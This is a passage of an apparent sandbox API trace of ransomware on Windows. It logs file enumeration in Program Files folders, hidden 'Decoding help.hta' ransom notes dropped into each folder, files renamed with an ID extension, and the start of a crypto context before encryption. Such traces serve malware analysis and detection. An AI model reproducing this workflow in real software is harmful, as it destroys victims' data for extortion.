Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.060] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_hov.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_hov.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.060] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbafafbe0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbafafbe0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb31511c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xba6, dwReserved0=0x0, dwReserved1=0x0, cFileName="reveal_rest.png", cAlternateFileName="")) returned 1 [0059.061] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.061] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.061] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.061] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.061] lstrcmpiW (lpString1="Decoding help.hta", lpString2="reveal_rest.png") returned -1 [0059.061] lstrlenW (lpString="reveal_rest.png") returned 15 [0059.061] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.061] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.061] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="reveal_rest.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png" [0059.061] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png" [0059.061] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_rest.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_rest.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.062] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbade6b6c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbade6b6c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb33b27c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x61b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tulip.jpg", cAlternateFileName="")) returned 1 [0059.062] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.062] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.062] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.062] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.062] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Tulip.jpg") returned -1 [0059.062] lstrlenW (lpString="Tulip.jpg") returned 9 [0059.062] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.062] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.062] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Tulip.jpg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg" [0059.062] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg" [0059.062] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0059.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\tulip.jpg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\tulip.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.062] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbade6b6c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbade6b6c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb33b27c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x61b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tulip.jpg", cAlternateFileName="")) returned 0 [0059.062] FindClose (in: hFindFile=0x5a5db0 | out: hFindFile=0x5a5db0) returned 1 Thread: id = 887 os_tid = 0x7a0 [0054.891] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*", lpFindFileData=0x2bf2fd30 | out: lpFindFileData=0x2bf2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14ebe6b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15087730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15087730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b50 [0056.268] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.268] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x2bf2fd30 | out: lpFindFileData=0x2bf2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14ebe6b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15087730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15087730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.268] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.268] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.268] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x2bf2fd30 | out: lpFindFileData=0x2bf2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2355ff00, ftCreationTime.dwHighDateTime=0x1caa4fd, ftLastAccessTime.dwLowDateTime=0x14ee4810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2355ff00, ftLastWriteTime.dwHighDateTime=0x1caa4fd, nFileSizeHigh=0x0, nFileSizeLow=0xfd04e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Assets.accdt", cAlternateFileName="ASSETS~1.ACC")) returned 1 [0056.626] lstrcpyW (in: lpString1=0x2aab8fa0, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*" [0056.626] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*") returned 63 [0056.626] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Decoding help.hta" [0056.626] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\decoding help.hta")) returned 0xffffffff [0056.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa30 [0058.220] WriteFile (in: hFile=0xa30, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2bf2fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2bf2fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.221] CloseHandle (hObject=0xa30) returned 1 [0058.221] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.221] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Assets.accdt") returned 1 [0058.221] lstrlenW (lpString="Assets.accdt") returned 12 [0058.221] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*" [0058.221] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*") returned 63 [0058.221] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\", lpString2="Assets.accdt" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt" [0058.221] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt" [0058.222] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt.[ID]g9uZrLhJaygpwRm1[ID]" [0058.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\assets.accdt"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\assets.accdt.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\assets.accdt.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9b4 [0061.606] CreateFileMappingA (hFile=0x9b4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9ac [0061.606] CryptAcquireContextA (phProv=0x2bf2fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 888 os_tid = 0xb38 [0055.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*", lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8196b61f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8196b61f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a6030 [0056.146] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.147] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8196b61f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8196b61f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.268] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.268] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.268] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc082453c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xc082453c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xc082453c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb22, dwReserved0=0x0, dwReserved1=0x0, cFileName="0.png", cAlternateFileName="")) returned 1 [0056.629] lstrcpyW (in: lpString1=0x2aac0fa8, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0056.629] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0056.629] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0056.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0xffffffff [0056.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa30 [0058.222] WriteFile (in: hFile=0xa30, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2c06fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2c06fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.223] CloseHandle (hObject=0xa30) returned 1 [0058.223] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.224] lstrcmpiW (lpString1="Decoding help.hta", lpString2="0.png") returned 1 [0058.224] lstrlenW (lpString="0.png") returned 5 [0058.224] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0058.224] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0058.224] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="0.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png" [0058.224] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png" [0058.224] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\0.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\0.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.081] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba036d48, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba036d48, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc082453c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5323, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.png", cAlternateFileName="")) returned 1 [0059.081] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0059.081] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0059.081] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0059.081] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0059.081] lstrcmpiW (lpString1="Decoding help.hta", lpString2="1.png") returned 1 [0059.081] lstrlenW (lpString="1.png") returned 5 [0059.081] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0059.081] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0059.081] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="1.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png" [0059.081] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png" [0059.081] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows 